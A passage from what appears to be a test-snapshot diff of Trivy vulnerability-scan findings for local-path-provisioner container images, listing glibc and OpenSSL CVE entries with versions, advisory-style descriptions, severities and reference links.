threat."", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://ubuntu.com/security/notices/USN-4891-1", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://ubuntu.com/security/notices/USN-5038-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://www.debian.org/security/2021/dsa-4875", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://www.openssl.org/news/secadv/20210325.txt", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-05", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-06", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23839", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "https://access.redhat.com/security/cve/CVE-2021-23839", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://www.cve.org/CVERecord?id=CVE-2021-23839", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "description": "OpenSSL 1.0.2 supports SSLv2. If a client attempts to negotiate SSLv2 with a server that is configured to support both SSLv2 and more recent SSL and TLS versions then a check is made for a version rollback attack when unpadding an RSA signature. Clients that support SSL or TLS versions greater than SSLv2 are supposed to use a special form of padding. A server that supports greater than SSLv2 is supposed to reject connection attempts from a client where this special form of padding is present, because this indicates that a version rollback has occurred (i.e. both client and server support greater than SSLv2, and yet this is the version that is being requested). The implementation of this padding check inverted the logic so that the connection attempt is accepted if the padding is present, and rejected if it is absent. This means that such as server will accept a connection if a version rollback attack has occurred. Further the server will erroneously reject a connection if a normal SSLv2 connection attempt is made. Only OpenSSL 1.0.2 servers from version 1.0.2s to 1.0.2x are affected by this issue. In order to be vulnerable a 1.0.2 server must: 1) have configured SSLv2 support at compile time (this is off by default), 2) have configured SSLv2 support at runtime (this is off by default), 3) have configured SSLv2 ciphersuites (these are not in the default ciphersuite list) OpenSSL 1.1.1 does not have SSLv2 support and therefore is not vulnerable to this issue. The underlying error is in the implementation of the RSA_padding_check_SSLv23() function. This also affects the RSA_SSLV23_PADDING padding mode used by various other functions. Although 1.1.1 does not support SSLv2 the RSA_padding_check_SSLv23() function still exists, as does the RSA_SSLV23_PADDING padding mode. Applications that directly call that function or use that padding mode will encounter this issue. However since there is no support for the SSLv2 protocol in 1.1.1 this is considered a bug and not a security issue in that version. OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.0.2y (Affected 1.0.2s-1.0.2x).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "name": "openssl: incorrect SSLv2 rollback protection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://avd.aquasec.com/nvd/cve-2021-23839", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://access.redhat.com/security/cve/CVE-2021-23839", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23839", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1n-0+deb11u4", + "fixedVersion": "1.1.1l-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3711", + "installedVersion": "1.1.1g-r0", "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/security/cve/CVE-2021-3711", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://security.netapp.com/advisory/ntap-20211022-0003/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", ], }, "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - -of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", + "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", + "name": "openssl: SM2 Decryption Buffer Overflow", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "https://avd.aquasec.com/nvd/cve-2021-3711", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "https://access.redhat.com/security/cve/CVE-2021-3711", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", - ], - }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://www.tenable.com/security/tns-2022-02", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1n-0+deb11u4", + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23840", + "installedVersion": "1.1.1g-r0", "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2021-23840", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-qgm6-9472-pwq7", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-23840.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", + "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", + "name": "openssl: integer overflow in 